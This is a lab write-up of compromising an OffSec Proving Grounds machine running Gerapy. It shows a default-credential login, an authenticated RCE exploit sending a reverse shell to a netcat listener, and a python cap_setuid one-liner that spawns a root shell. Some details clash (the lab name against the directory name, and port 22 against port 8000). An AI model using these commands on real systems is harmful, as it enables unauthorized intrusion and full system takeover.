As always in every penetration testing engagements we start by reconnaissance and information gathering, in this step we try to get as much information about the target as possible.
We can achieve that by using various of tools and techniques to obtain foothold on the target, by using enumeration, scanning and other recon techniques.
In this lab we are tasked to pentest this Linux Lab : BlackGate on Offsec's Proving grounds :
First step will be to check if the target is up and running, we could do so by sending ICMP requests to check if we can communicate with the target by running this command :
ping 192.168.204.24
Next I'll run the following command with rustscan to quickly scan for open ports :
┌──(root💀CSEC)-[/home/cyborgbytes/Documents/PGWriteupsOffsec/Levram]
└─# rustscan -a 192.168.204.24 --ulimit 5000 Afterwards we can see the output as follows:
From the scan I can see that there is two open ports :
Port 22
and
Port 8000going to the webpage on port 22 I can find that there is a login page and apparently I can login with default credentials:
admin — admin
but when I was on the login page I noticed the CMS is called Gerapy, after using searchsploit to search on ExploitDB database I found out that there is an exploit for this platform which also hints back to the service running on port 8000 which is :
WSGIServer 0.2 (Python 3.10.6)
I ran searchsploit along with the CMS name Gerapy :
the exploit is RCE, authenticated, and since we are authenticated in the platform so I guess that the exploit will work:
First before I run the exploit I'll run a listener with netcat :
nc -lnvp 9001Next I'll run the exploit as follows:
┌──(root💀CSEC)-[/home/cyborgbytes/Documents/PGWriteupsOffsec/Levram]
└─# python 50640.py -t 192.168.204.24 -p 8000 -L 192.168.45.181 -P 9001Vulnerability: Gerapy prior to version 0.9.8 is vulnerable to remote code execution. This issue is patched in version 0.9.8.
And BOOM! we got a shell !
And here we get the user flag, lets proceed to root.
I'll run linpeas for Privilege escalation, I prefer linpeas because it makes it easier to find PE Vectors and it's also automated !
/usr/bin/python3.10 cap_setuid=ep which is a high possible PE
Next is finding out how to exploit it:
by running the following command I can spawn a root shell easily:
/usr/bin/python3.10 -c 'import os; os.setuid(0); os.system("/bin/bash")'